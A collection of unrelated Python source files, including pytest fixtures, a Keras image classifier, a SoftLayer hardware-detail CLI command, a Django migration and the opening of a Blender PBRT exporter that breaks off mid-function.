    arr = list(map(int, input().strip().split(' ')))
    result = minimumAbsoluteDifference(n, arr)
    print(result)
|
import scaa
import numpy as np
import pytest
@pytest.fixture
def dims():
    """Problem sizes: data is (n, p); latent representation is (n, d)."""
    # n, p, d, stoch_samples
    return 50, 1000, 20, 10
@pytest.fixture
def simulate():
    """Small simulated Poisson dataset: 30 x 60, rank 1."""
    return scaa.benchmark.simulate_pois(
        n=30, p=60, rank=1, eta_max=3)
@pytest.fixture
def simulate_holdout():
    """Simulated Poisson dataset (200 x 300, rank 1) with 10% held out."""
    return scaa.benchmark.simulate_pois(
        n=200, p=300, rank=1, eta_max=3, holdout=.1)
@pytest.fixture
def simulate_train_test():
    """Simulated Poisson dataset split into train/test, plus the true eta."""
    data, eta = scaa.benchmark.simulate_pois(n=200, p=300, rank=1, eta_max=3)
    train_x, test_x = scaa.benchmark.train_test_split(data)
    return train_x, test_x, eta
|
# Simple checkout calculator: reads unit price, quantity and shipping cost
# from stdin (Portuguese prompts) and prints the grand total.
valor=float(input("coloque o valor dos jogos a serem comprado"))  # unit price per game
quantidade=float(input("coloque a quantidade de jogos"))  # number of games (read as float)
frete=float(input("coloque o valor do frete"))  # shipping cost
total=quantidade*valor+frete
print(total)
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 14 09:03:47 2018
@author: Home
"""
from keras.models import Sequential
from keras.layers.core import Flatten, Dense, Dropout
from keras.layers.convolutional import Convolution2D, MaxPooling2D, ZeroPadding2D
from keras.optimizers import SGD
from keras.preprocessing.image import ImageDataGenerator
# VGG16-style convolutional network for binary image classification,
# trained from directories of 64x64 RGB images.
classifier = Sequential()
# Stage 1: two 64-filter 3x3 convolutions, then 2x2 max-pool
classifier.add(ZeroPadding2D((1,1),input_shape=(64,64,3)))
classifier.add(Convolution2D(64, (3, 3), activation="relu"))
classifier.add(ZeroPadding2D((1,1)))
classifier.add(Convolution2D(64, (3, 3), activation="relu"))
classifier.add(MaxPooling2D((2,2), strides=(2,2)))
# Stage 2: two 128-filter convolutions
classifier.add(ZeroPadding2D((1,1)))
classifier.add(Convolution2D(128, (3, 3), activation='relu'))
classifier.add(ZeroPadding2D((1,1)))
classifier.add(Convolution2D(128, (3, 3), activation='relu'))
classifier.add(MaxPooling2D((2,2), strides=(2,2)))
# Stage 3: three 256-filter convolutions
classifier.add(ZeroPadding2D((1,1)))
classifier.add(Convolution2D(256, (3, 3), activation='relu'))
classifier.add(ZeroPadding2D((1,1)))
classifier.add(Convolution2D(256, (3, 3), activation='relu'))
classifier.add(ZeroPadding2D((1,1)))
classifier.add(Convolution2D(256, (3, 3), activation='relu'))
classifier.add(MaxPooling2D((2,2), strides=(2,2)))
# Stage 4: three 512-filter convolutions
classifier.add(ZeroPadding2D((1,1)))
classifier.add(Convolution2D(512, (3, 3), activation='relu'))
classifier.add(ZeroPadding2D((1,1)))
classifier.add(Convolution2D(512, (3, 3), activation='relu'))
classifier.add(ZeroPadding2D((1,1)))
classifier.add(Convolution2D(512, (3, 3), activation='relu'))
classifier.add(MaxPooling2D((2,2), strides=(2,2)))
# Stage 5: three more 512-filter convolutions
classifier.add(ZeroPadding2D((1,1)))
classifier.add(Convolution2D(512, (3, 3), activation='relu'))
classifier.add(ZeroPadding2D((1,1)))
classifier.add(Convolution2D(512, (3, 3), activation='relu'))
classifier.add(ZeroPadding2D((1,1)))
classifier.add(Convolution2D(512, (3, 3), activation='relu'))
classifier.add(MaxPooling2D((2,2), strides=(2,2)))
# Classifier head: two 4096-unit dense layers with dropout, then a single
# sigmoid output for the binary label.
classifier.add(Flatten())
classifier.add(Dense(4096, activation='relu'))
classifier.add(Dropout(0.5))
classifier.add(Dense(4096, activation='relu'))
classifier.add(Dropout(0.5))
classifier.add(Dense(1, activation='sigmoid'))
# SGD with momentum + Nesterov; binary cross-entropy for the sigmoid output.
sgd = SGD(lr=0.1, decay=1e-6, momentum=0.9, nesterov=True)
classifier.compile(optimizer=sgd, loss = 'binary_crossentropy', metrics = ['accuracy'])
# Training-time augmentation; test images are only rescaled.
train_datagen = ImageDataGenerator(
        rescale=1./255,
        shear_range=0.2,
        zoom_range=0.2,
        horizontal_flip=True)
test_datagen = ImageDataGenerator(rescale=1./255)
training_set = train_datagen.flow_from_directory('Dataset/training_set',#input folder
                                                 target_size=(64, 64),
                                                 batch_size=32,
                                                 class_mode='binary')
test_set = test_datagen.flow_from_directory(
        'Dataset/test_set', #path to test set
        target_size=(64, 64),
        batch_size=32,
        class_mode='binary')
# NOTE(review): steps_per_epoch is hard-coded to the training-image count,
# and validation_steps divides len(test_set) by 32 again even though the
# generator's len is already a batch count — confirm both values.
classifier.fit_generator(
        training_set,
        steps_per_epoch=1537, #insert number of images in training set
        epochs=1,
        validation_data=test_set,
        validation_steps=len(test_set)//32) #insert number of images in test set
|
"""A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
from setuptools import setup
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.rst')) as f:
    long_description = f.read()
# Package metadata for the ckip-segmenter distribution.
# NOTE(review): 'segementation' in keywords looks like a typo for
# 'segmentation'; it is published metadata, so left unchanged here.
setup(
    name='ckip-segmenter',
    version='1.0.2',
    description='Ckip Segmenter',
    long_description=long_description,
    url='https://github.com/henryyang42/ckip-segmenter',
    author='henryyang42',
    author_email='henryyang42@gmail.com',
    license='MIT',
    classifiers=[
        'Development Status :: 3 - Alpha',
        'Operating System :: OS Independent',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Natural Language :: Chinese (Traditional)',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Topic :: Text Processing',
        'Topic :: Text Processing :: Indexing',
        'Topic :: Text Processing :: Linguistic'
    ],
    python_requires='>=3',
    keywords='NLP,tokenizing,Chinese word segementation,part-of-speech tagging',
    py_modules=["ckip"],
)
|
"""Get details for a hardware device."""
# :license: MIT, see LICENSE for more details.
import click
import SoftLayer
from SoftLayer.CLI import environment
from SoftLayer.CLI import formatting
from SoftLayer.CLI import helpers
from SoftLayer import utils
@click.command()
@click.argument('identifier')
@click.option('--passwords', is_flag=True, help='Show passwords (check over your shoulder!)')
@click.option('--price', is_flag=True, help='Show associated prices')
@environment.pass_env
def cli(env, identifier, passwords, price):
    """Get details for a hardware device."""
    hardware = SoftLayer.HardwareManager(env.client)
    # Two-column key/value layout for the main output.
    table = formatting.KeyValueTable(['name', 'value'])
    table.align['name'] = 'r'
    table.align['value'] = 'l'
    # Resolve the user-supplied identifier (id or hostname) to a hardware id.
    hardware_id = helpers.resolve_id(hardware.resolve_ids, identifier, 'hardware')
    result = hardware.get_hardware(hardware_id)
    # NestedDict lets deep lookups below return {} instead of raising.
    result = utils.NestedDict(result)
    hard_drives = hardware.get_hard_drives(hardware_id)
    operating_system = utils.lookup(result, 'operatingSystem', 'softwareLicense', 'softwareDescription') or {}
    memory = formatting.gb(result.get('memoryCapacity', 0))
    # The owner is only derivable when a billing item is attached.
    owner = None
    if utils.lookup(result, 'billingItem') != []:
        owner = utils.lookup(result, 'billingItem', 'orderItem', 'order', 'userRecord', 'username')
    # Nested table listing each physical drive.
    table_hard_drives = formatting.Table(['Name', 'Capacity', 'Serial #'])
    for drives in hard_drives:
        name = drives['hardwareComponentModel']['manufacturer'] + " " + drives['hardwareComponentModel']['name']
        capacity = str(drives['hardwareComponentModel']['hardwareGenericComponentModel']['capacity']) + " " + str(
            drives['hardwareComponentModel']['hardwareGenericComponentModel']['units'])
        serial = drives['serialNumber']
        table_hard_drives.add_row([name, capacity, serial])
    # Core identity/spec rows.
    table.add_row(['id', result['id']])
    table.add_row(['guid', result['globalIdentifier'] or formatting.blank()])
    table.add_row(['hostname', result['hostname']])
    table.add_row(['domain', result['domain']])
    table.add_row(['fqdn', result['fullyQualifiedDomainName']])
    table.add_row(['status', result['hardwareStatus']['status']])
    table.add_row(['datacenter', result['datacenter']['name'] or formatting.blank()])
    table.add_row(['cores', result['processorPhysicalCoreAmount']])
    table.add_row(['memory', memory])
    table.add_row(['drives', table_hard_drives])
    table.add_row(['public_ip', result['primaryIpAddress'] or formatting.blank()])
    table.add_row(['private_ip', result['primaryBackendIpAddress'] or formatting.blank()])
    table.add_row(['ipmi_ip', result['networkManagementIpAddress'] or formatting.blank()])
    table.add_row(['os', operating_system.get('name') or formatting.blank()])
    table.add_row(['os_version', operating_system.get('version') or formatting.blank()])
    table.add_row(['created', result['provisionDate'] or formatting.blank()])
    table.add_row(['owner', owner or formatting.blank()])
    # Nested table of attached VLANs.
    vlan_table = formatting.Table(['type', 'number', 'id'])
    for vlan in result['networkVlans']:
        vlan_table.add_row([vlan['networkSpace'], vlan['vlanNumber'], vlan['id']])
    table.add_row(['vlans', vlan_table])
    # Bandwidth usage summary (see _bw_table).
    bandwidth = hardware.get_bandwidth_allocation(hardware_id)
    bw_table = _bw_table(bandwidth)
    table.add_row(['Bandwidth', bw_table])
    if result.get('notes'):
        table.add_row(['notes', result['notes']])
    # Optional price breakdown (--price flag).
    if price:
        total_price = utils.lookup(result, 'billingItem', 'nextInvoiceTotalRecurringAmount') or 0
        price_table = formatting.Table(['Item', 'Recurring Price'])
        price_table.add_row(['Total', total_price])
        for item in utils.lookup(result, 'billingItem', 'children') or []:
            price_table.add_row([item['description'], item['nextInvoiceTotalRecurringAmount']])
        table.add_row(['prices', price_table])
    # Optional credentials (--passwords flag): OS users and IPMI accounts.
    if passwords:
        pass_table = formatting.Table(['username', 'password'])
        for item in result['operatingSystem']['passwords']:
            pass_table.add_row([item['username'], item['password']])
        table.add_row(['users', pass_table])
        pass_table = formatting.Table(['ipmi_username', 'password'])
        for item in result['remoteManagementAccounts']:
            pass_table.add_row([item['username'], item['password']])
        table.add_row(['remote users', pass_table])
    table.add_row(['tags', formatting.tags(result['tagReferences'])])
    env.fout(table)
def _bw_table(bw_data):
    """Generates a bandwidth usage table.

    Public usage rows show the allotment amount (or '-' when none is set);
    private rows always show 'N/A'.
    """
    table = formatting.Table(['Type', 'In GB', 'Out GB', 'Allotment'])
    for point in bw_data.get('usage'):
        if point['type']['alias'] == 'PUBLIC_SERVER_BW':
            bw_kind = 'Public'
            if bw_data.get('allotment'):
                quota = utils.lookup(bw_data, 'allotment', 'amount')
            else:
                quota = '-'
        else:
            bw_kind = 'Private'
            quota = 'N/A'
        table.add_row([bw_kind, point['amountIn'], point['amountOut'], quota])
    return table
|
import sys
from contextlib import contextmanager
from types import TracebackType
from typing import Any, Callable, Generator, Optional, Type
from PyQt5 import QtWidgets
from qt_material import apply_stylesheet
from nitrokeyapp import get_theme_path
from nitrokeyapp.gui import GUI
from nitrokeyapp.logger import init_logging, log_environment
@contextmanager
def exception_handler(
    hook: Callable[[Type[BaseException], BaseException, Optional[TracebackType]], Any],
) -> Generator[None, None, None]:
    """Temporarily install *hook* as sys.excepthook.

    The previous hook is restored on exit, even if the managed block raises.
    """
    previous = sys.excepthook
    sys.excepthook = hook
    try:
        yield
    finally:
        sys.excepthook = previous
def main() -> None:
    """Application entry point: build the Qt app, apply theming, set up
    logging, and run the GUI event loop."""
    app = QtWidgets.QApplication(sys.argv)
    # set default material stylesheet if no system theme is set
    if not app.style().objectName() or app.style().objectName() == "fusion":
        apply_stylesheet(app, theme=get_theme_path())
    with init_logging() as log_file:
        log_environment()
        window = GUI(app, log_file)
        # Route uncaught exceptions to the GUI's handler while the loop runs.
        with exception_handler(window.trigger_handle_exception.emit):
            app.exec()
if __name__ == "__main__":
    main()
|
import sys
from collections import deque
# Read input: n people (numbered 1..n) and m friendship pairs
n = int(sys.stdin.readline())
m = int(sys.stdin.readline())
# People to invite to the wedding
answer = []
# Build the undirected friendship adjacency list
friends = [[] for _ in range(n+1)]
for _ in range(m):
    a, b = map(int, sys.stdin.readline().split())
    friends[a].append(b)
    friends[b].append(a)
# Two-level search: collect v, v's friends, and friends-of-friends.
# (The queue holds only v's direct friends, so exploration stops at depth 2.)
def bfs(v):
    answer.append(v)  # invite v themselves
    queue = deque(friends[v])
    while queue:
        c = queue.popleft()
        answer.append(c)  # invite the direct friend
        # invite friends-of-friends not already invited or queued
        for p in friends[c]:
            if p not in answer and p not in queue:
                answer.append(p)
# Find everyone within two degrees of person 1
bfs(1)
# Print the invite count
print(len(answer)-1) # excluding person 1 themselves
# Generated by Django 2.2.4 on 2019-08-16 15:27
import django.contrib.postgres.fields
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import model_utils.fields
import phonenumber_field.modelfields
import uuid
class Migration(migrations.Migration):
    """Initial schema for this app: raw/clean score-import tables
    (RawPanelist, RawSong, CleanPanelist, CleanSong, CleanFlat), the
    denormalized Complete/Selection tables joined by Flat, and the
    Group/Person reference tables."""
    initial = True
    dependencies = [
    ]
    operations = [
        # Cleaned panelist scoring rows, keyed by legacy integer id.
        migrations.CreateModel(
            name='CleanPanelist',
            fields=[
                ('id', models.IntegerField(editable=False, primary_key=True, serialize=False)),
                ('year', models.IntegerField()),
                ('season', models.IntegerField(choices=[(1, 'Summer'), (2, 'Midwinter'), (3, 'Fall'), (4, 'Spring')])),
                ('district', models.CharField(max_length=255)),
                ('convention', models.CharField(max_length=255)),
                ('session', models.IntegerField(choices=[(32, 'Chorus'), (41, 'Quartet'), (42, 'Mixed'), (43, 'Senior'), (44, 'Youth'), (45, 'Unknown'), (46, 'VLQ')])),
                ('round', models.IntegerField(choices=[(1, 'Finals'), (2, 'Semi-Finals'), (3, 'Quarter-Finals')])),
                ('category', models.IntegerField(choices=[(30, 'Music'), (40, 'Performance'), (50, 'Singing')])),
                ('num', models.IntegerField()),
                ('legacy_person', models.CharField(max_length=255)),
                ('scores', django.contrib.postgres.fields.jsonb.JSONField()),
                ('panelist_id', models.UUIDField(blank=True, null=True)),
            ],
        ),
        # Cleaned per-song scoring rows, keyed by legacy integer id.
        migrations.CreateModel(
            name='CleanSong',
            fields=[
                ('id', models.IntegerField(editable=False, primary_key=True, serialize=False)),
                ('year', models.IntegerField()),
                ('season', models.IntegerField(choices=[(1, 'Summer'), (2, 'Midwinter'), (3, 'Fall'), (4, 'Spring')])),
                ('district', models.CharField(max_length=255)),
                ('convention', models.CharField(max_length=255)),
                ('session', models.IntegerField(choices=[(32, 'Chorus'), (41, 'Quartet'), (42, 'Mixed'), (43, 'Senior'), (44, 'Youth'), (45, 'Unknown'), (46, 'VLQ')])),
                ('round', models.IntegerField(choices=[(1, 'Finals'), (2, 'Semi-Finals'), (3, 'Quarter-Finals')])),
                ('appearance_num', models.IntegerField()),
                ('song_num', models.IntegerField()),
                ('legacy_group', models.CharField(max_length=255)),
                ('legacy_chart', models.CharField(max_length=255)),
                ('scores', django.contrib.postgres.fields.jsonb.JSONField()),
                ('appearance_id', models.UUIDField(blank=True, null=True)),
                ('song_id', models.UUIDField(blank=True, null=True)),
            ],
        ),
        # Denormalized panelist-side rows (matched against Selection via Flat).
        migrations.CreateModel(
            name='Complete',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('row_id', models.IntegerField(blank=True, null=True)),
                ('year', models.IntegerField(blank=True, null=True)),
                ('season_kind', models.IntegerField(blank=True, choices=[(1, 'Summer'), (2, 'Midwinter'), (3, 'Fall'), (4, 'Spring')], null=True)),
                ('district_code', models.CharField(blank=True, max_length=255)),
                ('convention_name', models.CharField(blank=True, max_length=255)),
                ('session_kind', models.IntegerField(blank=True, choices=[(32, 'Chorus'), (41, 'Quartet'), (42, 'Mixed'), (43, 'Senior'), (44, 'Youth'), (45, 'Unknown'), (46, 'VLQ')], null=True)),
                ('round_kind', models.IntegerField(blank=True, choices=[(1, 'Finals'), (2, 'Semi-Finals'), (3, 'Quarter-Finals')], null=True)),
                ('category_kind', models.IntegerField(blank=True, choices=[(30, 'Music'), (40, 'Performance'), (50, 'Singing')], null=True)),
                ('points', django.contrib.postgres.fields.ArrayField(base_field=models.IntegerField(blank=True, null=True), blank=True, null=True, size=None)),
                ('person_id', models.UUIDField(blank=True, null=True)),
                ('panelist_id', models.UUIDField(blank=True, null=True)),
            ],
        ),
        # Reference table of competing groups/organizational units.
        migrations.CreateModel(
            name='Group',
            fields=[
                ('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
                ('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('name', models.CharField(default='UNKNOWN', help_text='\n    The name of the resource.\n    ', max_length=255)),
                ('kind', models.IntegerField(choices=[('International', [(1, 'International')]), ('District', [(11, 'District'), (12, 'Noncompetitive'), (13, 'Affiliate')]), ('Chapter', [(30, 'Chapter')]), ('Group', [(32, 'Chorus'), (41, 'Quartet'), (46, 'VLQ')])], help_text='\n    The kind of group.\n    ')),
                ('gender', models.IntegerField(choices=[(10, 'Male'), (20, 'Female'), (30, 'Mixed')], default=10, help_text='\n    The gender of group.\n    ')),
                ('division', models.IntegerField(blank=True, choices=[('EVG', [(10, 'EVG Division I'), (20, 'EVG Division II'), (30, 'EVG Division III'), (40, 'EVG Division IV'), (50, 'EVG Division V')]), ('FWD', [(60, 'FWD Arizona'), (70, 'FWD Northeast'), (80, 'FWD Northwest'), (90, 'FWD Southeast'), (100, 'FWD Southwest')]), ('LOL', [(110, 'LOL 10000 Lakes'), (120, 'LOL Division One'), (130, 'LOL Northern Plains'), (140, 'LOL Packerland'), (150, 'LOL Southwest')]), ('MAD', [(170, 'MAD Central'), (180, 'MAD Northern'), (190, 'MAD Southern')]), ('NED', [(210, 'NED Granite and Pine'), (220, 'NED Mountain'), (230, 'NED Patriot'), (240, 'NED Sunrise'), (250, 'NED Yankee')]), ('SWD', [(260, 'SWD Northeast'), (270, 'SWD Northwest'), (280, 'SWD Southeast'), (290, 'SWD Southwest')])], null=True)),
                ('bhs_id', models.IntegerField(blank=True, null=True, unique=True)),
                ('code', models.CharField(blank=True, help_text='\n    Short-form code.', max_length=255)),
                ('website', models.URLField(blank=True, default='', help_text='\n    The website URL of the resource.')),
                ('email', models.EmailField(blank=True, help_text='\n    The contact email of the resource.', max_length=254, null=True)),
                ('phone', models.CharField(blank=True, help_text='\n    The phone number of the resource.  Include country code.', max_length=25)),
                ('fax_phone', models.CharField(blank=True, help_text='\n    The fax number of the resource.  Include country code.', max_length=25)),
                ('start_date', models.DateField(blank=True, null=True)),
                ('end_date', models.DateField(blank=True, null=True)),
                ('location', models.CharField(blank=True, help_text='\n    The geographical location of the resource.', max_length=255)),
                ('facebook', models.URLField(blank=True, help_text='\n    The facebook URL of the resource.')),
                ('twitter', models.URLField(blank=True, help_text='\n    The twitter URL of the resource.')),
                ('youtube', models.URLField(blank=True, default='', help_text='\n    The youtube URL of the resource.')),
                ('pinterest', models.URLField(blank=True, default='', help_text='\n    The pinterest URL of the resource.')),
                ('flickr', models.URLField(blank=True, default='', help_text='\n    The flickr URL of the resource.')),
                ('instagram', models.URLField(blank=True, default='', help_text='\n    The instagram URL of the resource.')),
                ('soundcloud', models.URLField(blank=True, default='', help_text='\n    The soundcloud URL of the resource.')),
                ('image', models.URLField(blank=True, default='', max_length=255)),
                ('description', models.TextField(blank=True, help_text='\n    A description of the group.  Max 1000 characters.', max_length=1000)),
                ('participants', models.CharField(blank=True, default='', help_text='Director(s) or Members (listed TLBB)', max_length=255)),
                ('notes', models.TextField(blank=True, help_text='\n    Notes (for internal use only).')),
                ('international', models.TextField(blank=True, help_text='\n    The denormalized international group.', max_length=255)),
                ('district', models.TextField(blank=True, help_text='\n    The denormalized district group.', max_length=255)),
                ('chapter', models.TextField(blank=True, help_text='\n    The denormalized chapter group.', max_length=255)),
            ],
            options={
                'verbose_name_plural': 'Groups',
            },
        ),
        # Reference table of people (members, judges).
        migrations.CreateModel(
            name='Person',
            fields=[
                ('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
                ('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('status', models.IntegerField(choices=[(-10, 'Inactive'), (0, 'New'), (10, 'Active')], default=10, help_text='DO NOT CHANGE MANUALLY unless correcting a mistake.  Use the buttons to change state.')),
                ('prefix', models.CharField(blank=True, default='', help_text='\n    The prefix of the person.', max_length=255)),
                ('first_name', models.CharField(editable=False, help_text='\n    The first name of the person.', max_length=255)),
                ('middle_name', models.CharField(editable=False, help_text='\n    The middle name of the person.', max_length=255)),
                ('last_name', models.CharField(editable=False, help_text='\n    The last name of the person.', max_length=255)),
                ('nick_name', models.CharField(editable=False, help_text='\n    The nickname of the person.', max_length=255)),
                ('suffix', models.CharField(blank=True, default='', help_text='\n    The suffix of the person.', max_length=255)),
                ('birth_date', models.DateField(editable=False, null=True)),
                ('spouse', models.CharField(blank=True, default='', max_length=255)),
                ('location', models.CharField(blank=True, default='', help_text='\n    The geographical location of the resource.', max_length=255)),
                ('part', models.IntegerField(choices=[(1, 'Tenor'), (2, 'Lead'), (3, 'Baritone'), (4, 'Bass')], editable=False, null=True)),
                ('mon', models.IntegerField(editable=False, help_text='\n    Men of Note.', null=True)),
                ('gender', models.IntegerField(choices=[(10, 'Male'), (20, 'Female')], editable=False, null=True)),
                ('district', models.CharField(blank=True, default='', help_text='\n    District (used primarily for judges.)', max_length=10)),
                ('is_deceased', models.BooleanField(default=False, editable=False)),
                ('is_honorary', models.BooleanField(default=False, editable=False)),
                ('is_suspended', models.BooleanField(default=False, editable=False)),
                ('is_expelled', models.BooleanField(default=False, editable=False)),
                ('website', models.URLField(blank=True, default='', help_text='\n    The website URL of the resource.')),
                ('email', models.EmailField(editable=False, help_text='\n    The contact email of the resource.', max_length=254, null=True)),
                ('address', models.TextField(blank=True, default='', help_text='\n    The complete address of the resource.', max_length=1000)),
                ('home_phone', phonenumber_field.modelfields.PhoneNumberField(editable=False, help_text='\n    The home phone number of the resource.  Include country code.', max_length=128, region=None)),
                ('work_phone', phonenumber_field.modelfields.PhoneNumberField(editable=False, help_text='\n    The work phone number of the resource.  Include country code.', max_length=128, region=None)),
                ('cell_phone', phonenumber_field.modelfields.PhoneNumberField(editable=False, help_text='\n    The cell phone number of the resource.  Include country code.', max_length=128, region=None)),
                ('airports', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(blank=True, max_length=3), blank=True, null=True, size=None)),
                ('image', models.URLField(blank=True, max_length=255)),
                ('description', models.TextField(blank=True, default='', help_text='\n    A bio of the person.  Max 1000 characters.', max_length=1000)),
                ('notes', models.TextField(blank=True, default='', help_text='\n    Notes (for internal use only).')),
                ('bhs_id', models.IntegerField(editable=False)),
                ('mc_pk', models.CharField(blank=True, db_index=True, max_length=36, null=True, unique=True)),
            ],
            options={
                'verbose_name_plural': 'Persons',
            },
        ),
        # Raw panelist rows as imported (string-typed, pre-cleaning).
        migrations.CreateModel(
            name='RawPanelist',
            fields=[
                ('id', models.IntegerField(editable=False, primary_key=True, serialize=False)),
                ('year', models.IntegerField()),
                ('season', models.CharField(max_length=255)),
                ('district', models.CharField(max_length=255)),
                ('convention', models.CharField(max_length=255)),
                ('session', models.CharField(max_length=255)),
                ('round', models.CharField(max_length=255)),
                ('category', models.CharField(max_length=255)),
                ('num', models.IntegerField(blank=True, null=True)),
                ('judge', models.CharField(max_length=255)),
                ('scores', django.contrib.postgres.fields.jsonb.JSONField()),
            ],
        ),
        # Raw song rows as imported (string-typed, pre-cleaning).
        migrations.CreateModel(
            name='RawSong',
            fields=[
                ('id', models.IntegerField(editable=False, primary_key=True, serialize=False)),
                ('season', models.CharField(max_length=255)),
                ('year', models.IntegerField()),
                ('district', models.CharField(max_length=255)),
                ('event', models.CharField(max_length=255)),
                ('session', models.CharField(max_length=255)),
                ('group_name', models.CharField(max_length=255)),
                ('appearance_num', models.IntegerField()),
                ('song_num', models.IntegerField()),
                ('song_title', models.CharField(max_length=255)),
                ('totals', models.IntegerField()),
                ('scores', django.contrib.postgres.fields.jsonb.JSONField()),
            ],
        ),
        # Denormalized song-side rows (matched against Complete via Flat).
        migrations.CreateModel(
            name='Selection',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('mark', models.BooleanField(default=False)),
                ('row_id', models.IntegerField(blank=True, null=True)),
                ('year', models.IntegerField(blank=True, null=True)),
                ('season_kind', models.IntegerField(blank=True, choices=[(1, 'Summer'), (2, 'Midwinter'), (3, 'Fall'), (4, 'Spring')], null=True)),
                ('district_code', models.CharField(blank=True, max_length=255)),
                ('convention_name', models.CharField(blank=True, max_length=255)),
                ('session_kind', models.IntegerField(blank=True, choices=[(32, 'Chorus'), (41, 'Quartet'), (42, 'Mixed'), (43, 'Senior'), (44, 'Youth'), (45, 'Unknown'), (46, 'VLQ')], null=True)),
                ('round_kind', models.IntegerField(blank=True, choices=[(1, 'Finals'), (2, 'Semi-Finals'), (3, 'Quarter-Finals')], null=True)),
                ('group_name', models.CharField(blank=True, max_length=255)),
                ('appearance_num', models.IntegerField(blank=True, null=True)),
                ('song_num', models.IntegerField(blank=True, null=True)),
                ('song_title', models.CharField(blank=True, max_length=255)),
                ('totals', models.IntegerField(blank=True, null=True)),
                ('points', django.contrib.postgres.fields.ArrayField(base_field=models.IntegerField(blank=True, null=True), blank=True, null=True, size=None)),
                ('song_id', models.UUIDField(blank=True, null=True)),
            ],
        ),
        # Join table linking Complete and Selection rows to a score.
        migrations.CreateModel(
            name='Flat',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('score_id', models.UUIDField(blank=True, null=True)),
                ('complete', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='flats', to='keller.Complete')),
                ('selection', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='flats', to='keller.Selection')),
            ],
            options={
                'unique_together': {('complete', 'selection', 'score_id')},
            },
        ),
        # Join table linking CleanPanelist and CleanSong rows to points.
        migrations.CreateModel(
            name='CleanFlat',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('points', models.IntegerField()),
                ('score_id', models.UUIDField(blank=True, null=True)),
                ('cleanpanelist', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cleanflats', to='keller.CleanPanelist')),
                ('cleansong', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cleanflats', to='keller.CleanSong')),
            ],
            options={
                'unique_together': {('cleanpanelist', 'cleansong')},
            },
        ),
    ]
|
import bpy
from io_export_blend_to_renderer import pbrt
from bpy.types import NodeTree, Node, NodeSocket
import nodeitems_utils
from nodeitems_utils import NodeCategory, NodeItem, NodeItemCustom
import shutil
import os
# Node sockets
def Pbrt_SocketRGBA(socket):
    """Serialize a color socket as a PBRT `"rgb name" [r g b]` parameter (alpha dropped)."""
    c = socket.default_value
    return '"rgb {}" [{} {} {}]'.format(socket.name, c[0], c[1], c[2])
def Pbrt_SocketINT(socket):
    """Serialize an integer socket as a PBRT `"integer name" value` parameter."""
    return '"integer {}" {}'.format(socket.name, socket.default_value)
def Pbrt_SocketBOOL(socket):
    """Serialize a boolean socket as a PBRT `"bool name" "true"/"false"` parameter.

    Fix: the previous code emitted Python's `True`/`False` via str(), which
    pbrt's parser rejects; PBRT expects a quoted lowercase boolean literal.
    """
    literal = "true" if socket.default_value else "false"
    return "\"bool " + socket.name + "\" \"" + literal + "\""
def Pbrt_SocketVALUE(socket):
    """Serialize a float socket as a PBRT `"float name" value` parameter."""
    return '"float {}" {}'.format(socket.name, socket.default_value)
def Pbrt_SocketSHADER(socket, data):
    """Serialize a shader socket as a reference to a named material.

    If a PbrtMaterialNode is linked into this socket, export it first as a
    MakeNamedMaterial statement appended to `data`, then return a
    `"string name" "material.N"` reference to it.  Unlinked sockets and
    non-PBRT links yield an empty string.

    Fix: the alias is now computed once and reused.  Previously the declared
    name used len(data) *before* the nested export while the returned
    reference used len(data)-1 *after* it, so a linked material that itself
    exported nested named materials produced a dangling reference.
    """
    if len(socket.links) > 0:
        node = socket.links[0].from_node
        if isinstance(node, PbrtMaterialNode):
            alias = "material." + str(len(data))
            data.append(Pbrt_ExistingExportMaterial(node, alias, data))
            return "\"string " + socket.name + "\" \"" + alias + "\""
    return ""
def Pbrt_AddTexture(socket, node, data):
    """Export a Blender texture node as a PBRT `Texture` statement.

    The statement is appended to `data`; the return value is the
    `"texture socketname" "Texture_N"` parameter that references it.
    Only TEX_IMAGE (-> imagemap) and TEX_CHECKER (-> checkerboard) are
    supported; any other node type leaves tex_type as None and produces a
    literal "None" in the output -- NOTE(review): looks unintended, confirm
    callers only pass these two types (see Pbrt_ExportSockets).
    """
    tex_type = None
    tex_parameter = ""
    # NOTE(review): name is derived from len(pbrt.textures), but textures are
    # appended to `data` -- presumably pbrt.textures is kept in sync by the
    # caller; TODO confirm, otherwise names may collide.
    tex_name = "Texture_" + str(len(pbrt.textures))
    if node.type == "TEX_IMAGE":
        tex_type = "imagemap"
        tex_parameter += "\"string filename\" \"textures/"+node.image.name+"\" "
        # Copy the source image into the exporter's texture folder once.
        if not os.path.isfile(pbrt.texture_path+node.image.name):
            try:
                shutil.copyfile(bpy.path.abspath(node.image.filepath), pbrt.texture_path+node.image.name)
            except IOError as io_err:
                # Destination folder missing: create it and retry the copy.
                os.makedirs(pbrt.texture_path)
